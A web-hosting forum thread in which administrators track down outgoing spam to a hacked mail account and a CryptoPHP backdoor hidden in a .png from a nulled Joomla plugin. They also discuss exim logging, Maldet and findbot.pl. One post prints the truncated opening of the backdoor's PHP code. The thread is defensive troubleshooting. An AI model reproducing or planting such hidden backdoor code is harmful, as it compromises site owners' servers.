Which script sends spam?

[Richard G]

Is there a way to discover which script is sending spam?
On a cpanel server I can always see it in the headers of mails which are returned.

I always thought this could also be done by adding these lines to exim.conf log_selector:

+connection_reject \
+address_rewrite \
+all_parents \
+arguments \

Seems though our server ip is suddenly on the abuseat blacklist because according to the info the server is infected with cryptphp malware or another spambot.

I can 't see anything in the mailqueue's though. Maldet is running but takes forever to scan the whole server.

Is there another way so the sending script will get mentioned in the mailheader somewhere?

 

[zEitEr]

Hello,

With pached PHP 5.2 and mail.add_x_header a sending script can be seen in mail headers. I'm sure your are aware of it.

Recently I've seen very unusuall way of sending spam through a server. No sockets were used, and no traces in mail logs or else where. Just a copy of httpd server running on another port. Make sure you've got no a copy httpd server on a high-number port or any other cron tasks running.

 

[Richard G]

I'm running php 5.3 and mail.add_x_header is on by default as far as I can see.
I'm indeed experiencing the thing you mention. Nothing is to be seen in logs. However I ran into some mails in the mailqueu. Looks like an email account was hacked.

However I must also investigate Maldetect. This should be running every night. It does. It has found something october 3rth, but I did not get an email about it.
Maldetect is not sending out emails, in spite of the fact that email_alert=1 is set in maldet.conf.
The manual scan last night showed 17 infected files.

However this was not containing the user which caused the problem. Also.... on another server maldet found nothing, and there also was 1 user which was sending out spam and CBL said a cryptphp malware was present. So probably that user's account was hacked too.

Any clue on why Maldet is not sending mails?

 

[Richard G]

Hacker found on 1 server. It was not a script, it was a hacked email account, so authenticated mail was used to spam.
However, not with 100's of mails at a time, because then it would be easily found.

 

[Richard G]

Found the backdoor.
It was indeed cryptophp, and a .png file was causing the trouble. The png is imported when installing a plugin from a malicious website.
It's now that a script called Jsecure downloaded from nulledstylez.com contains the backdoor trojan, but there are more, not only for Joomla but also for Wordpress.

The .png file contains things like (opened with vim):

<?php error_reporting(0); ini_set('display_errors', 0);@ini_set('max_execution_time', 300);@set_time_limit(0);function XJmVaOhvhAQNo
aACoDOM() { if (!defined('WP_OPTION_KEY')) { define('WP_OPTION_KEY', 'wp_data_newa');

etc. which should not be in there. FoxIT discovered this.
And opened with nano, you can even see a public key block.

Glad I found this mother with help of my collegues in the Netherlands and FoxIT.

 

[zEitEr]

Maldet as it was noticed does not find scripts and malware which is not known to it. It uses hashes and etc. Other way to find malware is to read PHP scripts and/or other files and check their content either by running find,read,grep or using this: http://cbl.abuseat.org/findbot.pl

 

[Richard G]

Yes I know about findbot.pl. Have you ever used it? I tried and you get hundreds of results with "suspicious" behind it. Mostly all normal legal files.
I never thought it could be an image file. So I have learned a lesson.

 

[zEitEr]

Yes, I have. It lists too many files.

 

[nobaloney]

Recently I've seen very unusuall way of sending spam through a server. No sockets were used, and no traces in mail logs or else where. Just a copy of httpd server running on another port. Make sure you've got no a copy httpd server on a high-number port or any other cron tasks running.

Alex,

Was it actually a copy of apache or other httpd server? Or another program just using the name httpd in the hopes you wouldn't notice it?

Jeff